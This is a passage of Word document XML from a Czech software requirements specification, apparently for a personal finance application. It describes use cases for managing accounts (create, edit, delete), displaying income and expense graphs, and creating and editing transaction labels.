        <w:t>Podmínky pro spuštění</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA15C6" w:rsidRPr="00173253" w:rsidRDefault="00EA15C6" w:rsidP="00EA15C6">
      <w:r>
        <w:t>Uživatel je přihlášen do systému.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA15C6" w:rsidRDefault="00EA15C6" w:rsidP="00EA15C6">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Základní tok</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA15C6" w:rsidRDefault="00C915F9" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uživatel zvolí možnost vytvoření nového účtu</w:t>
      </w:r>
      <w:r w:rsidR="00450903">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00450903" w:rsidRDefault="00450903" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Systém vygeneruje formulář.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00450903" w:rsidRDefault="00450903" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uživatel vyplní název účtu</w:t>
      </w:r>
      <w:r w:rsidR="003601D3">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> počáteční stav finančních prostředků</w:t>
      </w:r>
      <w:r w:rsidR="003601D3">
        <w:t xml:space="preserve"> a odešle formulář.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003601D3" w:rsidRPr="003601D3" w:rsidRDefault="003601D3" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Systém vytvoří účet a uloží zadané údaje.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA15C6" w:rsidRDefault="00EA15C6" w:rsidP="00EA15C6">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Podmínky po dokončení</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003601D3" w:rsidRPr="003601D3" w:rsidRDefault="003601D3" w:rsidP="003601D3">
      <w:r>
        <w:t>Nový účet uživatele je uložen v</w:t>
      </w:r>
      <w:r w:rsidR="00381787">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t>systému.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004954AE" w:rsidRDefault="004954AE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD49DD" w:rsidRDefault="00381787" w:rsidP="00381787">
      <w:pPr>
        <w:pStyle w:val="Nadpis4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">UC09: </w:t>
      </w:r>
      <w:r w:rsidR="00CD49DD">
        <w:t>Editace účtu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA15C6" w:rsidRPr="002F5FD7" w:rsidRDefault="00EA15C6" w:rsidP="00EA15C6">
      <w:r>
        <w:t xml:space="preserve">UC </w:t>
      </w:r>
      <w:r w:rsidR="004A50DD">
        <w:t>umožňuje uživateli upravit údaje o existujícím účtu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA15C6" w:rsidRPr="008F1CD3" w:rsidRDefault="00EA15C6" w:rsidP="00EA15C6">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Aktéři</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA15C6" w:rsidRDefault="00EA15C6" w:rsidP="00EA15C6">
      <w:r>
        <w:t>Zaregistrovaný uživatel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA15C6" w:rsidRDefault="00EA15C6" w:rsidP="00EA15C6">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Podmínky pro spuštění</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA15C6" w:rsidRPr="00173253" w:rsidRDefault="00EA15C6" w:rsidP="00EA15C6">
      <w:r>
        <w:t>Uživatel je přihlášen do systému.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA15C6" w:rsidRDefault="00EA15C6" w:rsidP="00EA15C6">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Základní tok</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA15C6" w:rsidRDefault="00C562B9" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uživatel v</w:t>
      </w:r>
      <w:r w:rsidR="00381787">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">seznamu účtů vybere účet, který </w:t>
      </w:r>
      <w:r w:rsidR="00710DAF">
        <w:t xml:space="preserve">si přeje </w:t>
      </w:r>
      <w:r>
        <w:t>upravit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C562B9" w:rsidRDefault="00C562B9" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Systém vygeneruje formulář, jehož editační pole jsou vyplněné aktuálními údaji o účtu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C562B9" w:rsidRDefault="00C562B9" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uživatel může změnit název účtu nebo počáteční stav finančních prostředků a odešle formulář.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C562B9" w:rsidRPr="00EA15C6" w:rsidRDefault="00C562B9" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Systém uloží změněné údaje.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA15C6" w:rsidRDefault="00EA15C6" w:rsidP="00EA15C6">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Podmínky po dokončení</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA15C6" w:rsidRPr="00EA15C6" w:rsidRDefault="00C562B9" w:rsidP="00EA15C6">
      <w:r>
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidR="00381787">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t>systému jsou uloženy aktualizované údaje o účtu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004954AE" w:rsidRDefault="004954AE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD49DD" w:rsidRDefault="00381787" w:rsidP="00381787">
      <w:pPr>
        <w:pStyle w:val="Nadpis4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">UC10: </w:t>
      </w:r>
      <w:r w:rsidR="00CD49DD">
        <w:t>Odstranění účtu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA15C6" w:rsidRPr="002F5FD7" w:rsidRDefault="00EA15C6" w:rsidP="00EA15C6">
      <w:r>
        <w:t xml:space="preserve">UC </w:t>
      </w:r>
      <w:r w:rsidR="009A0BD8">
        <w:t>umožňuje uživateli odstranit existující účet včetně všech s</w:t>
      </w:r>
      <w:r w:rsidR="00381787">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="009A0BD8">
        <w:t>ním spojených dat.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA15C6" w:rsidRPr="008F1CD3" w:rsidRDefault="00EA15C6" w:rsidP="00EA15C6">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Aktéři</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA15C6" w:rsidRDefault="00EA15C6" w:rsidP="00EA15C6">
      <w:r>
        <w:t>Zaregistrovaný uživatel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA15C6" w:rsidRDefault="00EA15C6" w:rsidP="00EA15C6">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Podmínky pro spuštění</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA15C6" w:rsidRPr="00173253" w:rsidRDefault="00EA15C6" w:rsidP="00EA15C6">
      <w:r>
        <w:t>Uživatel je přihlášen do systému.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA15C6" w:rsidRDefault="00EA15C6" w:rsidP="00EA15C6">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Základní tok</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA15C6" w:rsidRDefault="009A0BD8" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uživatel v</w:t>
      </w:r>
      <w:r w:rsidR="00381787">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">seznamu účtů vybere účet, který </w:t>
      </w:r>
      <w:r w:rsidR="00710DAF">
        <w:t xml:space="preserve">si přeje </w:t>
      </w:r>
      <w:r>
        <w:t>odstranit a zvolí u něj možnost odstranit účet.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A0BD8" w:rsidRDefault="009A0BD8" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Systém uživatele informuje o nenávratnosti tohoto kroku a vyžádá si potvrzení uživatele.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A0BD8" w:rsidRDefault="009A0BD8" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uživatel potvrdí svůj úmysl odstranit vybraný účet.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A0BD8" w:rsidRPr="00EA15C6" w:rsidRDefault="009A0BD8" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Vybraný účet je odstraněn ze systému včetně všech s</w:t>
      </w:r>
      <w:r w:rsidR="00381787">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ním spojených </w:t>
      </w:r>
      <w:r w:rsidR="001D593A">
        <w:t>dat</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA15C6" w:rsidRDefault="00EA15C6" w:rsidP="00EA15C6">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Alternativní tok 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A0BD8" w:rsidRPr="009A0BD8" w:rsidRDefault="009A0BD8" w:rsidP="009A0BD8">
      <w:r>
        <w:t>3.1</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Pokud uživatel nepotvrdí svůj úmysl odstranit vybraný účet, tak UC končí.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA15C6" w:rsidRDefault="00EA15C6" w:rsidP="00EA15C6">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Podmínky po dokončení</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA15C6" w:rsidRDefault="009A0BD8" w:rsidP="00EA15C6">
      <w:r>
        <w:t>Účet je odstraněn ze systému včetně všech s</w:t>
      </w:r>
      <w:r w:rsidR="00381787">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t>ním spojených dat.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004954AE" w:rsidRDefault="004954AE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="009040A9" w:rsidRDefault="00381787" w:rsidP="00381787">
      <w:pPr>
        <w:pStyle w:val="Nadpis4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">UC11: </w:t>
      </w:r>
      <w:r w:rsidR="00AC5103">
        <w:t>Zobrazení grafů</w:t>
      </w:r>
      <w:r w:rsidR="009040A9">
        <w:t xml:space="preserve"> vývoje příjmů, výdajů a bilance</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009040A9" w:rsidRPr="002F5FD7" w:rsidRDefault="009040A9" w:rsidP="009040A9">
      <w:r>
        <w:t>UC umožňuje uživateli zobrazit grafů vývoje příjmů, výdajů a bilance na zvolených účtech.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009040A9" w:rsidRPr="008F1CD3" w:rsidRDefault="009040A9" w:rsidP="009040A9">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Aktéři</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009040A9" w:rsidRDefault="009040A9" w:rsidP="009040A9">
      <w:r>
        <w:t>Zaregistrovaný uživatel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009040A9" w:rsidRDefault="009040A9" w:rsidP="009040A9">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Podmínky pro spuštění</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009040A9" w:rsidRPr="00173253" w:rsidRDefault="009040A9" w:rsidP="009040A9">
      <w:r>
        <w:t>Uživatel je přihlášen do systému.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009040A9" w:rsidRDefault="009040A9" w:rsidP="009040A9">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Základní tok</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009040A9" w:rsidRDefault="009040A9" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uživatel zvolí zobrazení statistik o účtech.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009040A9" w:rsidRDefault="009040A9" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Systém vygeneruje formulář.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009040A9" w:rsidRDefault="009040A9" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uživatel ve formuláři vybere účty, které chce do grafů zahrnout a zvolí časové období.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009040A9" w:rsidRPr="00EA15C6" w:rsidRDefault="009040A9" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Systém vygeneruje grafy vývoje součtu příjmů, výdajů a celkové bilance na všech vybraných účtech za zvolené časové období. </w:t>
      </w:r>
      <w:r w:rsidR="00AC5103">
        <w:t>Data budou agregovaná buď po dnech, týdnech, měsících nebo letech dle délky zvoleného časového období.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009040A9" w:rsidRDefault="009040A9" w:rsidP="009040A9">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Alternativní tok 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC5103" w:rsidRPr="00AC5103" w:rsidRDefault="00AC5103" w:rsidP="00AC5103">
      <w:r>
        <w:t>4.1</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Pokud ve vybraném období nejsou na zvolených účtech evidovány žádné transakce, </w:t>
      </w:r>
      <w:r w:rsidR="001D593A">
        <w:t xml:space="preserve">nebudou </w:t>
      </w:r>
      <w:r>
        <w:t>grafy zobraz</w:t>
      </w:r>
      <w:r w:rsidR="001D593A">
        <w:t>eny</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009040A9" w:rsidRDefault="009040A9" w:rsidP="009040A9">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Podmínky po dokončení</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC5103" w:rsidRPr="00AC5103" w:rsidRDefault="00AC5103" w:rsidP="00AC5103">
      <w:r>
        <w:t>Uživateli jsou zobrazeny grafy vývoje příjmů, výdajů a bilance na zvolených účtech za zvolené časové období.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00381787" w:rsidRDefault="00381787">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD49DD" w:rsidRDefault="00CD49DD" w:rsidP="00CD49DD">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="136" w:name="_Toc387327854"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Správa štítků</w:t>
      </w:r>
      <w:bookmarkEnd w:id="136"/>
    </w:p>
    <w:p w:rsidR="009A0BD8" w:rsidRDefault="009A0BD8" w:rsidP="009A0BD8">
      <w:r>
        <w:t>V této podkapitole jsou popsány scénáře, které se týkají správy š</w:t>
      </w:r>
      <w:r w:rsidR="00432042">
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:t>ítků.</w:t>
      </w:r>
      <w:r w:rsidR="00576AD6">
        <w:t xml:space="preserve"> Štítky slouží ke kategorizaci transakcí.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00432042" w:rsidRDefault="00381787" w:rsidP="00381787">
      <w:pPr>
        <w:pStyle w:val="Nadpis4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">UC12: </w:t>
      </w:r>
      <w:r w:rsidR="00432042">
        <w:t>Vytvoření nového štítku</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00432042" w:rsidRPr="002F5FD7" w:rsidRDefault="00432042" w:rsidP="00432042">
      <w:r>
        <w:t>UC umožňuje uživateli vytvořit nový štítek. Po jeho vytvoření k</w:t>
      </w:r>
      <w:r w:rsidR="00381787">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">němu </w:t>
      </w:r>
      <w:r w:rsidR="00C17C5A">
        <w:t xml:space="preserve">bude možné </w:t>
      </w:r>
      <w:r>
        <w:t>přiřazovat transakce.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00432042" w:rsidRPr="008F1CD3" w:rsidRDefault="00432042" w:rsidP="00432042">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Aktéři</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00432042" w:rsidRDefault="00432042" w:rsidP="00432042">
      <w:r>
        <w:t>Zaregistrovaný uživatel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00432042" w:rsidRDefault="00432042" w:rsidP="00432042">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Podmínky pro spuštění</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00432042" w:rsidRPr="00173253" w:rsidRDefault="00432042" w:rsidP="00432042">
      <w:r>
        <w:t>Uživatel je přihlášen do systému.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00432042" w:rsidRDefault="00432042" w:rsidP="00432042">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Základní tok</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00432042" w:rsidRDefault="00432042" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uživatel zvolí možnost vytvoření nového štítku.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00432042" w:rsidRDefault="00432042" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Systém vygeneruje formulář.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00432042" w:rsidRDefault="00432042" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uživatel vyplní název štítku a odešle formulář.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00432042" w:rsidRDefault="00432042" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Systém ověří unikátnost zadaného názvu a vytvoří nový štítek.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00432042" w:rsidRDefault="00432042" w:rsidP="00432042">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Alternativní tok 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00432042" w:rsidRPr="003601D3" w:rsidRDefault="00432042" w:rsidP="00432042">
      <w:r>
        <w:t>4.1</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Jestliže uživatel zadal název již existující</w:t>
      </w:r>
      <w:r w:rsidR="00E06A3E">
        <w:t>ho</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> štítku, je na tuto skutečnost upozorněn a musí zvolit jiný název. UC pokračuje krokem 3 základního toku.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00432042" w:rsidRDefault="00432042" w:rsidP="00432042">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Podmínky po dokončení</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00432042" w:rsidRPr="003601D3" w:rsidRDefault="00432042" w:rsidP="00432042">
      <w:r>
        <w:t>Nový štítek je uložen v</w:t>
      </w:r>
      <w:r w:rsidR="00381787">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t>systému a je možné k</w:t>
      </w:r>
      <w:r w:rsidR="00381787">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t>němu přiřazovat transakce.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004954AE" w:rsidRDefault="004954AE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00432042" w:rsidRDefault="00381787" w:rsidP="00381787">
      <w:pPr>
        <w:pStyle w:val="Nadpis4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">UC13: </w:t>
      </w:r>
      <w:r w:rsidR="00432042">
        <w:t>Editace štítku</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00432042" w:rsidRPr="002F5FD7" w:rsidRDefault="00432042" w:rsidP="00432042">
      <w:r>
        <w:t>UC umožňuje uživateli upravit údaje o existujícím štítku.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00432042" w:rsidRPr="008F1CD3" w:rsidRDefault="00432042" w:rsidP="00432042">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Aktéři</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00432042" w:rsidRDefault="00432042" w:rsidP="00432042">
      <w:r>
        <w:t>Zaregistrovaný uživatel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00432042" w:rsidRDefault="00432042" w:rsidP="00432042">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Podmínky pro spuštění</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00432042" w:rsidRPr="00173253" w:rsidRDefault="00432042" w:rsidP="00432042">
      <w:r>
        <w:t>Uživatel je přihlášen do systému.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00432042" w:rsidRDefault="00432042" w:rsidP="00432042">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Základní tok</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00432042" w:rsidRDefault="00432042" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uživatel v</w:t>
      </w:r>
      <w:r w:rsidR="00381787">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">seznamu štítků vybere štítek, </w:t>
      </w:r>
      <w:r w:rsidR="00216F1C">
        <w:t xml:space="preserve">který </w:t>
      </w:r>
      <w:r w:rsidR="00710DAF">
        <w:t xml:space="preserve">si přeje </w:t>
